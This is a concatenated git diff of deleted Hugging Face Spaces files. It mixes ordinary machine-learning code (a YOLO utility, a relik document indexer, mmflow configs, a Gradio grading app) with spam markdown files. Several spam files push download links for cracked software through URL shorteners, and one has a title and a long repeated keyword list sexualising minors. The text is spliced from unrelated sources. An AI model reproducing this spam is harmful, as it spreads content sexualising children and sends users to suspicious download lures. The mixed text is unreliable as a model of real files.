cv2.imwrite('test%i.jpg' % j, cutout) - - im = im[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416 - im = np.ascontiguousarray(im, dtype=np.float32) # uint8 to float32 - im /= 255.0 # 0 - 255 to 0.0 - 1.0 - ims.append(im) - - pred_cls2 = model(torch.Tensor(ims).to(d.device)).argmax(1) # classifier prediction - x[i] = x[i][pred_cls1 == pred_cls2] # retain matching class detections - - return x - - -def increment_path(path, exist_ok=True, sep=''): - # Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc. - path = Path(path) # os-agnostic - if (path.exists() and exist_ok) or (not path.exists()): - return str(path) - else: - dirs = glob.glob(f"{path}{sep}*") # similar paths - matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs] - i = [int(m.groups()[0]) for m in matches if m] # indices - n = max(i) + 1 if i else 2 # increment number - return f"{path}{sep}{n}" # update path diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md deleted file mode 100644 index 82980beb5e216445b04dbebd312cbbb78b20bebc..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Fotos De Meninas De 13 14 15 Anos Nuasl.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Fotos De Meninas De 13 14 15 Anos Nuasl


        DOWNLOAD ---> https://urlgoal.com/2uCKCV



        - -De 16 Years old) De 16 Anali Cyvoa De 16 Anali Vld 2 De 16 Anali A Hi Pup (DVD) De 16 Anali Del Pelo De 16 Anali Pulp Fiction De 16 Anali Pulp De 16 Bratias De 16 Eva Aladro De 16 Free Download Erotic Xxxx Girls De 16 Free Download Erotic Girls De 16 Free Download Pink Erotic Porn Nudes De 16 Pussy Close Ups De 16 Sexy Girls De 16 Teen Fisting De 16 Tight Girls De 16 Tight Pussy De 16 Ultra Hot Girls De 16 Young Hot Porn Stars De 16 Hot Lesbian Girls De 16 Young Girls De 16 Young Girls Feet Foot Fetish De 16 Young Girls Fucked De 16 Young Girls Showing De 16 Young Girls Tv De 16 Young Girls This De 16 Young Girls Tits De 16 Young Girls Toes De 16 Young Girls Undies De 16 Young Girls Webcam De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls Xxx De 16 Young Girls X 4fefd39f24
        -
        -
        -

        diff --git a/spaces/reddysh/pls/Dockerfile b/spaces/reddysh/pls/Dockerfile deleted file mode 100644 index 6c01c09373883afcb4ea34ae2d316cd596e1737b..0000000000000000000000000000000000000000 --- a/spaces/reddysh/pls/Dockerfile +++ /dev/null @@ -1,21 +0,0 @@ -FROM node:18-bullseye-slim - -RUN apt-get update && \ - -apt-get install -y git - -RUN git clone https://gitgud.io/khanon/oai-reverse-proxy.git /app - -WORKDIR /app - -RUN npm install - -COPY Dockerfile greeting.md* .env* ./ - -RUN npm run build - -EXPOSE 7860 - -ENV NODE_ENV=production - -CMD [ "npm", "start" ] \ No newline at end of file diff --git a/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py b/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py deleted file mode 100644 index 8fb49bcaedf3f81c906c59dc23e7f8e0472a8598..0000000000000000000000000000000000000000 --- a/spaces/riccorl/relik-entity-linking/relik/retriever/indexers/inmemory.py +++ /dev/null @@ -1,287 +0,0 @@ -import contextlib -import logging -import os -from typing import Callable, List, Optional, Tuple, Union - -import torch -from torch.utils.data import DataLoader -from tqdm import tqdm - -from relik.common.log import get_logger -from relik.retriever.common.model_inputs import ModelInputs -from relik.retriever.data.base.datasets import BaseDataset -from relik.retriever.data.labels import Labels -from relik.retriever.indexers.base import BaseDocumentIndex -from relik.retriever.pytorch_modules import PRECISION_MAP, RetrievedSample - -logger = get_logger(__name__, level=logging.INFO) - - -class InMemoryDocumentIndex(BaseDocumentIndex): - DOCUMENTS_FILE_NAME = "documents.json" - EMBEDDINGS_FILE_NAME = "embeddings.pt" - - def __init__( - self, - documents: Union[str, List[str], Labels, os.PathLike, List[os.PathLike]] = None, - embeddings: Optional[torch.Tensor] = None, - device: str = "cpu", - precision: Optional[str] = None, - name_or_dir: Optional[Union[str, os.PathLike]] = None, - *args, - **kwargs, - ) -> None: - """ - An in-memory indexer. - - Args: - documents (:obj:`Union[List[str], PassageManager]`): - The documents to be indexed. - embeddings (:obj:`Optional[torch.Tensor]`, `optional`, defaults to :obj:`None`): - The embeddings of the documents. - device (:obj:`str`, `optional`, defaults to "cpu"): - The device to be used for storing the embeddings. - """ - - super().__init__(documents, embeddings, name_or_dir) - - if embeddings is not None and documents is not None: - logger.info("Both documents and embeddings are provided.") - if documents.get_label_size() != embeddings.shape[0]: - raise ValueError( - "The number of documents and embeddings must be the same." - ) - - # embeddings of the documents - self.embeddings = embeddings - # does this do anything? - del embeddings - # convert the embeddings to the desired precision - if precision is not None: - if ( - self.embeddings is not None - and self.embeddings.dtype != PRECISION_MAP[precision] - ): - logger.info( - f"Index vectors are of type {self.embeddings.dtype}. " - f"Converting to {PRECISION_MAP[precision]}." - ) - self.embeddings = self.embeddings.to(PRECISION_MAP[precision]) - else: - if ( - device == "cpu" - and self.embeddings is not None - and self.embeddings.dtype != torch.float32 - ): - logger.info( - "Index vectors are of type {}. Converting to float32.".format( - self.embeddings.dtype - ) - ) - self.embeddings = self.embeddings.to(PRECISION_MAP[32]) - # move the embeddings to the desired device - if self.embeddings is not None and not self.embeddings.device == device: - self.embeddings = self.embeddings.to(device) - - # device to store the embeddings - self.device = device - # precision to be used for the embeddings - self.precision = precision - - @torch.no_grad() - @torch.inference_mode() - def index( - self, - retriever, - documents: Optional[List[str]] = None, - batch_size: int = 32, - num_workers: int = 4, - max_length: Optional[int] = None, - collate_fn: Optional[Callable] = None, - encoder_precision: Optional[Union[str, int]] = None, - compute_on_cpu: bool = False, - force_reindex: bool = False, - add_to_existing_index: bool = False, - ) -> "InMemoryDocumentIndex": - """ - Index the documents using the encoder. - - Args: - retriever (:obj:`torch.nn.Module`): - The encoder to be used for indexing. - documents (:obj:`List[str]`, `optional`, defaults to :obj:`None`): - The documents to be indexed. - batch_size (:obj:`int`, `optional`, defaults to 32): - The batch size to be used for indexing. - num_workers (:obj:`int`, `optional`, defaults to 4): - The number of workers to be used for indexing. - max_length (:obj:`int`, `optional`, defaults to None): - The maximum length of the input to the encoder. - collate_fn (:obj:`Callable`, `optional`, defaults to None): - The collate function to be used for batching. - encoder_precision (:obj:`Union[str, int]`, `optional`, defaults to None): - The precision to be used for the encoder. - compute_on_cpu (:obj:`bool`, `optional`, defaults to False): - Whether to compute the embeddings on CPU. - force_reindex (:obj:`bool`, `optional`, defaults to False): - Whether to force reindexing. - add_to_existing_index (:obj:`bool`, `optional`, defaults to False): - Whether to add the new documents to the existing index. - - Returns: - :obj:`InMemoryIndexer`: The indexer object. - """ - - if documents is None and self.documents is None: - raise ValueError("Documents must be provided.") - - if self.embeddings is not None and not force_reindex: - logger.info( - "Embeddings are already present and `force_reindex` is `False`. Skipping indexing." - ) - if documents is None: - return self - - if collate_fn is None: - tokenizer = retriever.passage_tokenizer - - def collate_fn(x): - return ModelInputs( - tokenizer( - x, - padding=True, - return_tensors="pt", - truncation=True, - max_length=max_length or tokenizer.model_max_length, - ) - ) - - if force_reindex: - if documents is not None: - self.documents.add_labels(documents) - data = [k for k in self.documents.get_labels()] - - else: - if documents is not None: - data = [k for k in Labels(documents).get_labels()] - else: - return self - - # if force_reindex: - # data = [k for k in self.documents.get_labels()] - - dataloader = DataLoader( - BaseDataset(name="passage", data=data), - batch_size=batch_size, - shuffle=False, - num_workers=num_workers, - pin_memory=False, - collate_fn=collate_fn, - ) - - encoder = retriever.passage_encoder - - # Create empty lists to store the passage embeddings and passage index - passage_embeddings: List[torch.Tensor] = [] - - encoder_device = "cpu" if compute_on_cpu else self.device - - # fucking autocast only wants pure strings like 'cpu' or 'cuda' - # we need to convert the model device to that - device_type_for_autocast = str(encoder_device).split(":")[0] - # autocast doesn't work with CPU and stuff different from bfloat16 - autocast_pssg_mngr = ( - contextlib.nullcontext() - if device_type_for_autocast == "cpu" - else ( - torch.autocast( - device_type=device_type_for_autocast, - dtype=PRECISION_MAP[encoder_precision], - ) - ) - ) - with autocast_pssg_mngr: - # Iterate through each batch in the dataloader - for batch in tqdm(dataloader, desc="Indexing"): - # Move the batch to the device - batch: ModelInputs = batch.to(encoder_device) - # Compute the passage embeddings - passage_outs = encoder(**batch).pooler_output - # Append the passage embeddings to the list - if self.device == "cpu": - passage_embeddings.extend([c.detach().cpu() for c in passage_outs]) - else: - passage_embeddings.extend([c for c in passage_outs]) - - # move the passage embeddings to the CPU if not already done - # the move to cpu and then to gpu is needed to avoid OOM when using mixed precision - if not self.device == "cpu": # this if is to avoid unnecessary moves - passage_embeddings = [c.detach().cpu() for c in passage_embeddings] - # stack it - passage_embeddings: torch.Tensor = torch.stack(passage_embeddings, dim=0) - # move the passage embeddings to the gpu if needed - if not self.device == "cpu": - passage_embeddings = passage_embeddings.to(PRECISION_MAP[self.precision]) - passage_embeddings = passage_embeddings.to(self.device) - self.embeddings = passage_embeddings - - # free up memory from the unused variable - del passage_embeddings - - return self - - @torch.no_grad() - @torch.inference_mode() - def search(self, query: torch.Tensor, k: int = 1) -> list[list[RetrievedSample]]: - """ - Search the documents using the query. - - Args: - query (:obj:`torch.Tensor`): - The query to be used for searching. - k (:obj:`int`, `optional`, defaults to 1): - The number of documents to be retrieved. - - Returns: - :obj:`List[RetrievedSample]`: The retrieved documents. - """ - # fucking autocast only wants pure strings like 'cpu' or 'cuda' - # we need to convert the model device to that - device_type_for_autocast = str(self.device).split(":")[0] - # autocast doesn't work with CPU and stuff different from bfloat16 - autocast_pssg_mngr = ( - contextlib.nullcontext() - if device_type_for_autocast == "cpu" - else ( - torch.autocast( - device_type=device_type_for_autocast, - dtype=self.embeddings.dtype, - ) - ) - ) - with autocast_pssg_mngr: - similarity = torch.matmul(query, self.embeddings.T) - # Retrieve the indices of the top k passage embeddings - retriever_out: Tuple = torch.topk( - similarity, k=min(k, similarity.shape[-1]), dim=1 - ) - # get int values - batch_top_k: List[List[int]] = retriever_out.indices.detach().cpu().tolist() - # get float values - batch_scores: List[List[float]] = retriever_out.values.detach().cpu().tolist() - # Retrieve the passages corresponding to the indices - batch_passages = [ - [self.documents.get_label_from_index(i) for i in indices] - for indices in batch_top_k - ] - # build the output object - batch_retrieved_samples = [ - [ - RetrievedSample(label=passage, index=index, score=score) - for passage, index, score in zip(passages, indices, scores) - ] - for passages, indices, scores in zip( - batch_passages, batch_top_k, batch_scores - ) - ] - return batch_retrieved_samples diff --git a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py b/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py deleted file mode 100644 index 19b88e66f1c8da2f0f32166f2d34d765ba46c82f..0000000000000000000000000000000000000000 --- a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/irrpwc.py +++ /dev/null @@ -1,103 +0,0 @@ -model = dict( - type='IRRPWC', - encoder=dict( - type='PWCNetEncoder', - in_channels=3, - net_type='Small', - pyramid_levels=[ - 'level1', 'level2', 'level3', 'level4', 'level5', 'level6' - ], - out_channels=(16, 32, 64, 96, 128, 196), - strides=(2, 2, 2, 2, 2, 2), - dilations=(1, 1, 1, 1, 1, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - decoder=dict( - type='IRRPWCDecoder', - flow_levels=[ - 'level0', 'level1', 'level2', 'level3', 'level4', 'level5', - 'level6' - ], - corr_in_channels=dict( - level2=32, level3=64, level4=96, level5=128, level6=196), - corr_feat_channels=32, - flow_decoder_in_channels=115, - occ_decoder_in_channels=114, - corr_cfg=dict(type='Correlation', max_displacement=4), - scaled=True, - warp_cfg=dict(type='Warp', align_corners=True), - densefeat_channels=(128, 128, 96, 64, 32), - flow_post_processor=dict( - type='ContextNet', - in_channels=565, - out_channels=2, - feat_channels=(128, 128, 128, 96, 64, 32), - dilations=(1, 2, 4, 8, 16, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - flow_refine=dict( - type='FlowRefine', - in_channels=35, - feat_channels=(128, 128, 64, 64, 32, 32), - patch_size=3, - warp_cfg=dict(type='Warp', align_corners=True, use_mask=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - ), - occ_post_processor=dict( - type='ContextNet', - in_channels=563, - out_channels=1, - feat_channels=(128, 128, 128, 96, 64, 32), - dilations=(1, 2, 4, 8, 16, 1), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1)), - occ_refine=dict( - type='OccRefine', - in_channels=65, - feat_channels=(128, 128, 64, 64, 32, 32), - patch_size=3, - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - warp_cfg=dict(type='Warp', align_corners=True), - ), - occ_upsample=dict( - type='OccShuffleUpsample', - in_channels=11, - feat_channels=32, - infeat_channels=16, - out_channels=1, - warp_cfg=dict(type='Warp', align_corners=True, use_mask=True), - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - ), - occ_refined_levels=['level0', 'level1'], - flow_div=20., - act_cfg=dict(type='LeakyReLU', negative_slope=0.1), - flow_loss=dict( - type='MultiLevelEPE', - weights=dict( - level6=0.32, - level5=0.08, - level4=0.02, - level3=0.01, - level2=0.005, - level1=0.00125, - level0=0.0003125), - p=2, - reduction='sum'), - occ_loss=dict( - type='MultiLevelBCE', - weights=dict( - level6=0.32, - level5=0.08, - level4=0.02, - level3=0.01, - level2=0.005, - level1=0.00125, - level0=0.0003125), - reduction='sum'), - ), - init_cfg=dict( - type='Kaiming', - a=0.1, - nonlinearity='leaky_relu', - layer=['Conv2d', 'ConvTranspose2d'], - mode='fan_in', - bias=0), - train_cfg=dict(), - test_cfg=dict()) diff --git a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py b/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py deleted file mode 100644 index 1e8f90c4b69ca0d19e7d972f8c3fdfab4573f823..0000000000000000000000000000000000000000 --- a/spaces/richardzhangy26/yandian_flow_classification/configs/_base_/models/raft.py +++ /dev/null @@ -1,48 +0,0 @@ -model = dict( - type='RAFT', - num_levels=4, - radius=4, - cxt_channels=128, - h_channels=128, - encoder=dict( - type='RAFTEncoder', - in_channels=3, - out_channels=256, - net_type='Basic', - norm_cfg=dict(type='IN'), - init_cfg=[ - dict( - type='Kaiming', - layer=['Conv2d'], - mode='fan_out', - nonlinearity='relu'), - dict(type='Constant', layer=['InstanceNorm2d'], val=1, bias=0) - ]), - cxt_encoder=dict( - type='RAFTEncoder', - in_channels=3, - out_channels=256, - net_type='Basic', - norm_cfg=dict(type='SyncBN'), - init_cfg=[ - dict( - type='Kaiming', - layer=['Conv2d'], - mode='fan_out', - nonlinearity='relu'), - dict(type='Constant', layer=['SyncBatchNorm2d'], val=1, bias=0) - ]), - decoder=dict( - type='RAFTDecoder', - net_type='Basic', - num_levels=4, - radius=4, - iters=12, - corr_op_cfg=dict(type='CorrLookup', align_corners=True), - gru_type='SeqConv', - flow_loss=dict(type='SequenceLoss'), - act_cfg=dict(type='ReLU')), - freeze_bn=False, - train_cfg=dict(), - test_cfg=dict(), -) diff --git a/spaces/riffusion/riffusion-playground/README.md b/spaces/riffusion/riffusion-playground/README.md deleted file mode 100644 index 5f5a28a28446a619447a2401474b528b85c7a5e2..0000000000000000000000000000000000000000 --- a/spaces/riffusion/riffusion-playground/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Riffusion Playground -emoji: 📚 -colorFrom: red -colorTo: purple -sdk: streamlit -sdk_version: 1.15.2 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py deleted file mode 100644 index c68489f9c22e112ceae9c265e916cc3c1a6ae301..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/detectors/mask_rcnn.py +++ /dev/null @@ -1,27 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -from ..builder import DETECTORS -from .two_stage import TwoStageDetector - - -@DETECTORS.register_module() -class MaskRCNN(TwoStageDetector): - """Implementation of `Mask R-CNN `_""" - - def __init__(self, - backbone, - rpn_head, - roi_head, - train_cfg, - test_cfg, - neck=None, - pretrained=None, - init_cfg=None): - super(MaskRCNN, self).__init__( - backbone=backbone, - neck=neck, - rpn_head=rpn_head, - roi_head=roi_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - pretrained=pretrained, - init_cfg=init_cfg) diff --git a/spaces/rohan13/grady/app.py b/spaces/rohan13/grady/app.py deleted file mode 100644 index f88c69036aac17116bef966284f20204ae8f5081..0000000000000000000000000000000000000000 --- a/spaces/rohan13/grady/app.py +++ /dev/null @@ -1,117 +0,0 @@ -import gradio as gr -from main import index, run -from gtts import gTTS -import os, time - -from transformers import pipeline - -p = pipeline("automatic-speech-recognition") - -"""Use text to call chat method from main.py""" - -models = ["GPT-3.5", "Flan UL2", "GPT-4", "Flan T5"] - -def add_text(history, text, model): - print("Question asked: " + text) - response = run_model(text, model) - history = history + [(text, response)] - print(history) - return history, "" - - -def run_model(text, model): - start_time = time.time() - print("start time:" + str(start_time)) - response = run(text, model) - end_time = time.time() - # If response contains string `SOURCES:`, then add a \n before `SOURCES` - if "SOURCES:" in response: - response = response.replace("SOURCES:", "\nSOURCES:") - # response = response + "\n\n" + "Time taken: " + str(end_time - start_time) - print(response) - print("Time taken: " + str(end_time - start_time)) - return response - - - -def get_output(history, audio, model): - - txt = p(audio)["text"] - # history.append(( (audio, ) , txt)) - audio_path = 'response.wav' - response = run_model(txt, model) - # Remove all text from SOURCES: to the end of the string - trimmed_response = response.split("SOURCES:")[0] - myobj = gTTS(text=trimmed_response, lang='en', slow=False) - myobj.save(audio_path) - # split audio by / and keep the last element - # audio = audio.split("/")[-1] - # audio = audio + ".wav" - history.append(( (audio, ) , (audio_path, ))) - print(history) - return history - -def set_model(history, model): - print("Model selected: " + model) - history = get_first_message(history) - index(model) - return history - - -def get_first_message(history): - history = [(None, - '''Hi!! I AM GRADY!! I am a grading assistant to help you grade assignments based on a rubric!!
        - Today, I will be grading Paediatric Orthopaedic Quiz.
        - Use the format as given in the example below to get an accurate grade.
        - WARNING! I might get things wrong, so double check before your final grading. All the best. ''')] - return history - - -def bot(history): - return history - -with gr.Blocks() as demo: - gr.HTML("

        Grady - Your helpful Grading Assistant

        ") - chatbot = gr.Chatbot(get_first_message([]), elem_id="chatbot", interactive=True).style(height=500) - - with gr.Row(): - # Create radio button to select model - radio = gr.Radio(models, label="Choose a model", value="GPT-3.5", type="value", visible=False) - with gr.Row(): - with gr.Column(scale=0.75): - txt = gr.Textbox( - label="Student Response", - placeholder="Enter text and press enter", lines=1, interactive=True - ).style(container=False) - - with gr.Column(scale=0.25): - audio = gr.Audio(source="microphone", type="filepath").style(container=False) - with gr.Row(): - gr.Examples(examples=["""11: Currently the process is not very efficient as each patient goes through the same steps at the front desk and the radiology department although the sub-activities and processes are different. Also, the staff is doing multiple activities based on patient requirements.  - -One solution is to have a streamlined and differentiated process for each sub-type with dedicated staff. For example, at the front desk, all new patient cases can be handled by one nurse while all follow-up cases by a second nurse. - -Similarly, in the radiology department, all upper extremity cases can be handled by 2 technicians while lower extremity cases by the other 2 technicians with dedicated X-ray machines. The 3rd nurse will be responsible for handling the hand-off of X-rays and inserting them into the patient's files.  - -By having staff do a single type of task on a particular day, and by having the patients go through differentiated workflows, it should be possible to improve overall efficiency. """], inputs=[txt], label="Answers") - - txt.submit(add_text, [chatbot, txt, radio], [chatbot, txt], postprocess=False).then( - bot, chatbot, chatbot - ) - - audio.change(fn=get_output, inputs=[chatbot, audio, radio], outputs=[chatbot]).then( - bot, chatbot, chatbot - ) - - radio.change(fn=set_model, inputs=[chatbot, radio], outputs=[chatbot]).then(bot, chatbot, chatbot) - - audio.change(lambda:None, None, audio) - - set_model(chatbot, radio.value) - - - -if __name__ == "__main__": - demo.queue() - demo.queue(concurrency_count=5) - demo.launch(debug=True) diff --git a/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md b/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md deleted file mode 100644 index cab2db210499a14e1dae05876a8ab10cc7dfa035..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Background Remover v1 0 for Adobe Photoshop Cracked SSG Learn How to Use This Plugin in Minutes.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Background Remover v1 0 for Adobe Photoshop Cracked SSG


        Download Ziphttps://tinurll.com/2uzogv



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md b/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md deleted file mode 100644 index d754a78e6bfe0328dc1d2c1464648d3e0f2e451f..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Cocutprofessional2011crack BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

        cocutprofessional2011crack


        Download File » https://tinurll.com/2uzmYj



        - - 4d29de3e1b
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md b/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md deleted file mode 100644 index a8633fc32d3e2f9980631ee2ea0de2a50ef2d11f..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Download Java Game Untuk Hp Cross G10t Terbaru Play the Most Popular Games of Berserk Ricerca Winf and More.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Download Java Game Untuk Hp Cross G10t Terbaru berserk ricerca winf


        DOWNLOAD ->->->-> https://tinurll.com/2uzmjZ



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md b/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md deleted file mode 100644 index 8e42362ff830715e25bfc0072e26d251fe8a5537..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Entretien D Embauche En Anglais Pdf 24l Les Piges viter Et Les Astuces Connatre.md +++ /dev/null @@ -1,10 +0,0 @@ - -

        Les centrales entièrement équipées et optimisées des séries CN C et DN C sont encore plus compactes, plus efficaces sur le plan énergétique et plus faciles d'entretien. Et elles assurent des pressions de refoulement de 10 à 45 bar.

        -

        Elle diffuse en français, anglais, arabe et en espagnol[1] sur la TNT, le satellite, le câble, la télévision IP et le web. Elle est également disponible dans les hôtels, les compagnies aériennes, les aéroports, et ses programmes sont partiellement repris par les chaînes de télévision étrangères. Disponible dans plus de 355 millions de foyers à travers plus de 180 pays, France 24 est regardée chaque semaine par 55 millions de téléspectateurs en 2018, tandis que son site web est visité par plus de 18 millions d'internautes en moyenne chaque mois. La chaîne d'information France Info reprend ses programmes de minuit à 6 h 30 en semaine et de minuit à 6 h le week-end.

        -

        Entretien D Embauche En Anglais Pdf 24l


        DOWNLOADhttps://tinurll.com/2uzlWG



        -

        France 24 commence à émettre le 5 décembre 2006 à 20 h 29, uniquement en streaming sur Internet, puis dès le 6 décembre à la même heure sur le câble, le satellite et l'ADSL. Elle diffuse en français et en anglais, en Europe, en Afrique, au Proche et Moyen-Orient, et dans les villes de New York et Washington, touchant ainsi près de 75 millions de foyers dans plus de 90 pays[24],[25],[26].

        -

        Sur les trois canaux de diffusion (français, anglais, arabe), la chaîne propose un point complet sur l'actualité internationale toutes les heures (rediffusion à demie de l'heure) avec un journal en direct de 10 ou 15 minutes précédé d'une météo mondiale. Trois tranches d'information appelées Paris Direct sont diffusées chaque jour du lundi au vendredi, de 6 h à 10 h (fr+en), de 13 h à 15 h (fr+ar+en), et de 18 h à minuit (ar+en+fr). Elles traitent de l'actualité en continu avec un rappel des titres tous les quarts d'heure, des revues de presse française et internationale, et des chroniques culturelles, économiques et sportives[78].

        -

        France 24 utilise plusieurs moyens pour transmettre ses programmes dans le monde : la TNT, le satellite, le câble, le streaming sur PC et mobile (dont les applis mobiles), la télévision IP et l'OTT. De plus, la chaîne est diffusée dans les hôtels, et est partiellement reprise par des chaînes de télévision étrangères. Elle émet en 4 langues : le français, l'anglais, l'arabe[82],[83] et l'espagnol.

        -

        La chaîne émet en français et en anglais depuis le 5 décembre 2006 à 20 h 29 uniquement en streaming sur Internet, puis dès le 6 décembre à la même heure sur le câble, le satellite et l'ADSL[24],[25],[26]. Le 2 avril 2007, elle lance son canal en langue arabe avec quatre heures quotidiennes[28], puis dix heures à partir du 27 avril 2009[38], et enfin passe à 24h/24 le 12 octobre 2010[39]. Depuis le 9 janvier 2011, elle est entièrement diffusée au format 16/9, contre le format 4/3 auparavant[85],[86]. En septembre 2014, la chaîne inaugure ses nouveaux studios et régies en haute définition[78]. Elle lance un nouveau canal en espagnol à destination principalement de l'Amérique latine en septembre 2017[61].

        aaccfb2cb3
        -
        -
        \ No newline at end of file diff --git a/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md b/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md deleted file mode 100644 index a3d29aa36754f7961052c51bdb900f5a9bf94063..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Foster Homes For Imaginary Friends Porn Free.md +++ /dev/null @@ -1,5 +0,0 @@ -
        -

        Search foster home for imaginary friends porn Photos
        Search foster home for imaginary friends porn XXX Videos
        Search foster home for imaginary friends porn HD Videos
        Search foster home for imaginary friends porn Indian Videos
        Search foster home for imaginary friends porn MP4 Videos
        Search foster home for imaginary friends porn Indian Images
        Search foster home for imaginary friends porn Leaked Videos
        Search foster home for imaginary friends porn Leaked Pics
        Search foster home for imaginary friends porn XXX Posts

        -

        foster homes for imaginary friends porn


        Download ❤❤❤ https://tinurll.com/2uzlyc



        aaccfb2cb3
        -
        -
        \ No newline at end of file diff --git a/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py b/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py deleted file mode 100644 index b513b52267f7bf5aae09282c15b0a2e20c8a8fee..0000000000000000000000000000000000000000 --- a/spaces/rstallman/Mayfair-Partner-Music/audiocraft/utils/export.py +++ /dev/null @@ -1,56 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Utility to export a training checkpoint to a lightweight release checkpoint. -""" - -from pathlib import Path -import typing as tp - -from omegaconf import OmegaConf, DictConfig -import torch - - -def _clean_lm_cfg(cfg: DictConfig): - OmegaConf.set_struct(cfg, False) - # This used to be set automatically in the LM solver, need a more robust solution - # for the future. - cfg['transformer_lm']['card'] = 2048 - cfg['transformer_lm']['n_q'] = 4 - # Experimental params no longer supported. - bad_params = ['spectral_norm_attn_iters', 'spectral_norm_ff_iters', - 'residual_balancer_attn', 'residual_balancer_ff', 'layer_drop'] - for name in bad_params: - del cfg['transformer_lm'][name] - OmegaConf.set_struct(cfg, True) - return cfg - - -def export_encodec(checkpoint_path: tp.Union[Path, str], out_folder: tp.Union[Path, str]): - sig = Path(checkpoint_path).parent.name - assert len(sig) == 8, "Not a valid Dora signature" - pkg = torch.load(checkpoint_path, 'cpu') - new_pkg = { - 'best_state': pkg['ema']['state']['model'], - 'xp.cfg': OmegaConf.to_yaml(pkg['xp.cfg']), - } - out_file = Path(out_folder) / f'{sig}.th' - torch.save(new_pkg, out_file) - return out_file - - -def export_lm(checkpoint_path: 